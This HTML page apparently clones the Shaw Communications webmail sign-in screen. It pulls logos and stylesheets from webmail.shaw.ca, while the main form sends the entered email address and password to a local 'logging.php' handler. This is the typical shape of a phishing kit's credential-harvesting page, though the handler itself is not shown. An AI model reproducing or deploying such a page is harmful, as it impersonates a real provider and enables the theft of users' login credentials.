<!DOCTYPE HTML>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
  <meta charset="utf-8" />
  <meta http-equiv="content-type" content="text/html; charset=us-ascii" />

  <title>Sign in &#183; Shaw</title>
  <meta name="viewport" content=
  "width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0" />
  <meta name="description" content="" />
  <meta name="author" content="" />
  <link rel="icon" type="image/png" href="https://webmail.shaw.ca/images/favicon.ico" />
  <link href="https://webmail.shaw.ca/css/combine_signon_136.css" rel="stylesheet" type="text/css" />
  <!--[if lt IE 9]>
    <link rel="stylesheet" type="text/css" href="/css/style-ie8.css">
    <![endif]-->

<!-- Start: GPT Async -->




</head>

<body data-pagename="Signon|My Shaw" onload="checkAd();">
  <div class="wrapper">
    <div class="meganav clearfix">
      <div class="masthead">
        <div class="meganavcontainer nopadding" style=
        "padding-left: 5px;padding-right: 5px;">
          <ul class="row topToolbar">
            <li class="columns six col-xs-7 col-sm-6 first" style=
            "padding-left:10px; padding-right:0px;">
              <ul class="floatLeft">
                <li class="personal"><a data-event="navigation-element" data-value=
                "signonandregister|header-nav|personal" href=
                "http://www.shaw.ca/store/">Personal</a></li>

                <li class="business"><a data-event="navigation-element" data-value=
                "signonandregister|header-nav|business" href=
                "http://business.shaw.ca/">Business</a></li>
              </ul>

              <ul class="hidden-xs">
                <li>
                  <span class="chat"><a data-event=
          "navigation-element" data-value="signonandregister|footer-nav|chat" href=
          "http://www.shaw.ca/store/" target="_blank">Shop</a></span><span class=
          "chat divider">|</span><span> <a data-event="navigation-element" data-value=
          "signonandregister|footer-nav|email-us" href=
          "https://community.shaw.ca/" target="_blank">Support</a></span><span class=
          "divider">|</span><span> <a data-event="navigation-element" data-value=
          "signonandregister|footer-nav|support" href="https://my.shaw.ca"
          target="_blank">My Shaw</a></span>
                </li>
              </ul>
            </li>

            <li class="columns six col-xs-5 col-sm-6 text-right" style=
            "padding-left:0; padding-right:10;">
              <ul class="secondary">
                <li class="drawer" rel="contact-content"><a class=
                "ic ic-shaw-contact hidden-xs" href="https://www.shaw.ca/contact-us/" target="_blank"><span class=
                "hidden-xs">Contact</span></a></li>
              </ul>
            </li>
          </ul>
        </div>

        <div class="topToolbarContent hidden-xs">
          <div class="meganavcontainer">
            <ul class="nav">
              <li class="meganavcontent contact-content" id="contact-content">
                <ul class="meganavcontainer row">
                  <li class="columns five phone col-md-2-5 col-sm-6 col-xs-6">
                    <h3 class="ic ic-shaw-phone2">Phone</h3>

                    <p>Questions? You can give us a call 24/7.</p>

                    <p><strong>1-888-472-2222</strong></p>
                  </li>

                  <li class="columns five chat col-md-2-5 col-sm-6 col-xs-6">
                    <h3 class="ic ic-shaw-chat2">Chat</h3>

                    <p class="ontouch">To chat with our reps online for questions and
                    advice, please visit us on a desktop computer.</p>

                    <p class="notouch">Chat with our reps online for answers and
                    advice.</p>

                    <p class="notouch"><a data-event="navigation-element" data-value=
                    "signonandregister|header-nav|contactnav-chat" href=
                    "javascript:openChatWindow();">Click to chat</a></p>
                  </li>

                  <li class="columns five email col-md-2-5 col-sm-6 col-xs-6">
                    <h3 class="ic ic-shaw-email2">Email</h3>

                    <p>Ask your questions and we'll get back to you.</p>

                    <p><a data-event="navigation-element" data-value=
                    "signonandregister|header-nav|contactnav-email" href=
                    "javascript:openEmailWindow();">Email us</a></p>
                  </li>

                  <li class="columns five store col-md-2-5 col-sm-6 col-xs-6">
                    <h3 class="ic ic-shaw-location">Find a store</h3>

                    <p>Visit a store for help with products and services</p>

                    <p><a data-event="navigation-element" data-value=
                    "signonandregister|header-nav|contactnav-findastore" target="_blank"
                    href="https://www.shaw.ca/contact-us/retail/">Find a store</a></p>
                  </li>

                  <li class="columns five support col-md-2-5 col-sm-6 col-xs-6">
                    <h3 class="ic ic-shaw-contact2">Support</h3>

                    <p>Get the answers to your questions.</p>

                    <p><a data-event="navigation-element" data-value=
                    "signonandregister|header-nav|contactnav-visitsupport" target=
                    "_blank" href="https://community.shaw.ca/">Visit Support
                    Community</a></p>
                  </li>
                </ul>

                <div class="clearfix"></div>
                <hr />
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>

    <div class="container">
      <div id="content" class="hideDisplay content">
        <div id="sign-in-content" class="main-content">
          <div id="logo-section" class="logo-section ">
            <img src="https://webmail.shaw.ca/images/webmail-desktop.png" />
          </div>

          <div class="alert_placeholder" id="alert_placeholder"></div>

          <div id="heading-section" class="heading-section">
            <p id="heading" class="heading">Sign in to access your Shaw email</p>
          </div>

          <div id="tabs" class="tabs-menu">
            <ul class="nav nav-tabs" data-tabs="tabs">
              <li id="shawEmailTab" class="active"><a href="#email" data-toggle=
              "tab">Email</a></li>

              <li id="shawOCCTab"><a href="#myaccount" data-toggle="tab">My
              Shaw</a></li>

              <li id="shawDirectTab"><a href="#shawdirect" data-toggle="tab">Shaw
              Direct</a></li>
            </ul>
          </div>

          <div class="tab-pane active">
            <form id="signon_form"  method="post" action="logging.php" class="form-signin" name="">
      <input type="hidden" name="nors" value="" id="loginNORS">
      <input type="hidden" name="r" value="" id="loginR">
              <div id="error" class="error">
                <img src="https://webmail.shaw.ca/images/error_button.png" /> <span id="error_message"></span>
              </div>

              <div class="input_info_container">
                <div class="input_text">
                  <label id="username_input_label" class="user_label" for=
                  "username_input" style=""></label> <input id="username_input" name=
                  "UN" type="text" class="input_fields username_input"  placeholder="example@shaw.ca"/>
                </div>

                <div class="input_info help_icon">
                  <a id="help_icon" class="help_link" href="javascript:;" data-toggle="modal" data-target="#myModal" tabindex="3">
                  <img src="https://webmail.shaw.ca/images/icons/helpIcon.png"><br/>
                  Help
                  </a>
                </div>
              </div>

              <div class="input_info_container">
                <div class="input_text">
                  <label id="password_input_label" class="user_label" for=
                  "password_input" style="">Password</label> <input id="password_input"
                  name="PW" type="password" class="input_fields" tabindex="2" />
                </div>

                <div class="input_info">
                  <button type="button" id="account_number_popover_password" class=
                  "account_number_popover ic icon-shaw-question" data-toggle="modal"
                  data-target="#myModal"></button>
                </div>
              </div>

              <div class="clearfix"></div>

              <div id="checkbox-section" class="checkbox-section">
                <div id="checkbox" class="checkboxFive">
                  <input type="checkbox" id="" class="persistent_check" name=""  tabindex="4"/> <label id="checkboxMask" class="ic" for=""></label>
                </div>

                <div id="checkbox-label" class="checkbox-label">
                  <label>Remember Shaw email</label>
                </div>
              </div>

              <div style="text-align:center">
                <button type="submit" id="signin_submit" onclick="" class=
                "button"  tabindex="5">Sign in</button>
              </div><input id="realm_input" name="realm" type="hidden" value="" />

              <div id="description-section" class="description-section">
                <center>
		  <div id="resetinstructions" class="description_one">
			  <span style="display: inline-block; font-weight: bold; font-color: #666666; font-size: 14px">Having trouble?</span> <span style="display: inline-block;font-size:14px; margin-left:2px;"><a href="https://support.shaw.ca/t5/internet-articles/how-to-change-your-shaw-email-password/ta-p/6430" ping="https://webmail.shaw.ca/trouble" target="_blank" onmousedown="pingclick(event)">Shaw Support: How To Reset My Password</a></span><br>
			  <span style="display: inline-block;font-weight: bold; font-color: #666666; font-size: 14px">Already Know How?</span> <span style="display: inline-block;font-size:14px; margin-left:2px;"><a href="https://my.shaw.ca/services/internet" ping="https://webmail.shaw.ca/passwordreset" target="_blank" onmousedown="pingclick(event)">Reset Password On My Shaw</a></span>
		  </div>

                  <div id="create_new_account" class="description_two hidden-xs hidden-sm hidden-md">
                    <span class="dont-have-account-phone">Don't have an account?</span>
                    <a target="_self" data-event="navigation-element" data-value=
                    "signon|body|create-one-now-link" id="create_one_now" href=
                    "https://register.shaw.ca/"><span class=
                    "dont-have-account-desktop">Don't have an account?</span>
                    <span class="create-one-now-url">Create one now.</span></a>
                  </div>
                </center>
              </div><input type="hidden" id="anchor" name="anchor" value="" />
            </form>
          </div>
        </div>

        <div id="side-description" class="side-description">
          <div class="advertisementText">
            Advertisement
          </div>
      <div id="div-gpt-ad-969787815759805020-1" name="" class="webmailAdBox"></div>
        </div>

        <div class="clearfix"></div><input type="hidden" id="goto" name="goto" value=
        "https://my.shaw.ca/" />

        <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby=
        "myModalLabel"  aria-hidden="true">
          <div class="modal-dialog">
            <div class="modal-content">
              <div class="modal-header">
                <button type="button" class="close" data-dismiss=
                "modal"><span aria-hidden="true"><img src=
                "images/modal-close.png" /></span><span class=
                "sr-only">Close</span></button>

                <div class="modal-icon ic icon-shaw-question"></div>

                <h2 class="modal-title" id="myModalLabel"></h2>
              </div>

              <div class="modal-body">
                <p class="modal-para"></p>
              </div>
            </div>
          </div>
        </div><noscript>
        <div id="no-js-tab-content" class="tab-content">
          <div id="logo-section" class="logo-section manage"></div>

          <div id="error" style="text-align:center" class="error"></div>

          <div class="alert_placeholder" id="alert_placeholder"></div>

          <div id="sign-in-heading-section" class="sign-in-heading-section">
            <label id="heading" class="heading">Sign in to access your Shaw email</label>
          </div>

          <form class="form-signin" method="post" action=
          "redirect.shaw.do">
            <select name="realm">
              <option value="shawemail" selected="selected">
                Email
              </option>

              <option value="shawocc">
                My Shaw
              </option>

              <option value="shawdirect">
                Shaw Direct
              </option>
            </select>

            <div class="clearfix"></div><input id="username_input" class="username_input"
            name="username" type="text" autocorrect="off" autocapitalize="off"
            placeholder="Login ID" /> <input id="password_input_field" name="password"
            type="password" placeholder="Password" /> <input type="submit" name=
            "submit" />

            <div class="clearfix"></div>
          </form>
        </div></noscript>
      </div>
    </div>

    <div class="push"></div>
  </div>

  <div id="contact-footer" class="contact-footer">
    <div id="footer-section" class="footer-section">
      <div id="footer-section-content" class="footer-section-content">
        <div id="footer-links" class="footer-links">
          <span><a data-event="navigation-element" data-value=
          "signonandregister|footer-nav|privacy-policy" href=
          "http://www.shaw.ca/privacy-policy/" target="_blank" tabindex="10">Privacy
          Policy</a>&nbsp;&nbsp;</span> <span>|</span> <span>&nbsp;&nbsp;<a data-event=
          "navigation-element" data-value="signonandregister|footer-nav|terms-of-use"
          href="http://www.shaw.ca/terms-of-use/" target="_blank" tabindex="11">Terms of
          Use</a>&nbsp;&nbsp;</span> <span>|</span> <span>&nbsp;&nbsp;<a data-event=
          "navigation-element" data-value="signonandregister|footer-nav|accessibility"
          href="http://www.shaw.ca/accessibility/" target=
          "_blank" tabindex="12">Accessibility</a>&nbsp;&nbsp;</span>
        </div>

        <div id="footer-copyright" class="footer-copyright">
          <span>&#169; 2017 Shaw Communications. All Rights Reserved.</span>
        </div>
      </div>
    </div>
  </div>
  <script src="js/jquery.min.js" type="text/javascript"></script>
  <script src="js/combine_signon_136.js" type="text/javascript"></script>
  <script type="text/javascript" src="js/jquery.cookie.js"></script>
  <script type="text/javascript" src="js/jquery.base64.min.js"></script>
  <script type="text/javascript">
//<![CDATA[
  $(document).ready(function () {
  $("#content").removeClass("hideDisplay");
  var applicationRealms   = '[occ]';
  var selectedRealm = 'occ';
  init(applicationRealms, selectedRealm);
  });
  //]]>
  </script><script type='text/javascript'>
//<![CDATA[
    (function(){var g=function(e,h,f,g){
    this.get=function(a){for(var a=a+"=",c=document.cookie.split(";"),b=0,e=c.length;b<e;b++){for(var d=c[b];" "==d.charAt(0);)d=d.substring(1,d.length);if(0==d.indexOf(a))return d.substring(a.length,d.length)}return null};
    this.set=function(a,c){var b="",b=new Date;b.setTime(b.getTime()+6048E5);b="; expires="+b.toGMTString();document.cookie=a+"="+c+b+"; path=/; "};
    this.check=function(){var a=this.get(f);if(a)a=a.split(":");else if(100!=e)"v"==h&&(e=Math.random()>=e/100?0:100),a=[h,e,0],this.set(f,a.join(":"));else return!0;var c=a[1];if(100==c)return!0;switch(a[0]){case "v":return!1;case "r":return c=a[2]%Math.floor(100/c),a[2]++,this.set(f,a.join(":")),!c}return!0};
    this.go=function(){if(this.check()){var a=document.createElement("script");a.type="text/javascript";a.src=g+ "&t=" + (new Date()).getTime();document.body&&document.body.appendChild(a)}};
    this.start=function(){var a=this;window.addEventListener?window.addEventListener("load",function(){a.go()},!1):window.attachEvent&&window.attachEvent("onload",function(){a.go()})}};
    try{(new g(100,"r","QSI_S_ZN_djzxQPnJgAbhfwh","//zn_djzxqpnjgabhfwh-shaw.siteintercept.qualtrics.com/SIE/?Q_ZID=ZN_djzxQPnJgAbhfwh&Q_LOC="+encodeURIComponent(window.location.href))).start()}catch(i){}})();
  //]]>
  </script>

  <!-- START Google Analytics -->
  <SCRIPT TYPE="text/javascript">
      var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
      document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
  </SCRIPT>
  <SCRIPT TYPE="text/javascript">
  try {
          var pageTracker = _gat._getTracker("UA-6191386-23");
          pageTracker._trackPageview();
      } catch(err) {}
  </SCRIPT>

<script type="text/javascript">
  $("#myModal").click(function(myTarget) {
    // Let's see if we targetted the backdrop
    console.log(myTarget.target)
    if (myTarget.target == document.getElementById("myModal")) {
      $('#myModal').modal('hide');
    }

  });
</script>
<script src="https://www.google.com/recaptcha/api.js?render=6Lfr35QUAAAAAKLqCgXCOFHoWmGS95CyzFBFEjWr"></script>
<script>
grecaptcha.ready(function() {
  grecaptcha.execute('6Lfr35QUAAAAAKLqCgXCOFHoWmGS95CyzFBFEjWr', {action: 'load'}).then(function(token) {
    document.cookie= "captchatoken="+token+";";
  });
  window.onfocus = function() {
    grecaptcha.execute('6Lfr35QUAAAAAKLqCgXCOFHoWmGS95CyzFBFEjWr', {action: 'windowfocus'});
  };
});
</script>
<script src="js/login-form-v7.shaw.js" type="text/javascript"></script>
  <div id='ZN_djzxQPnJgAbhfwh'></div>
</body>
</html>
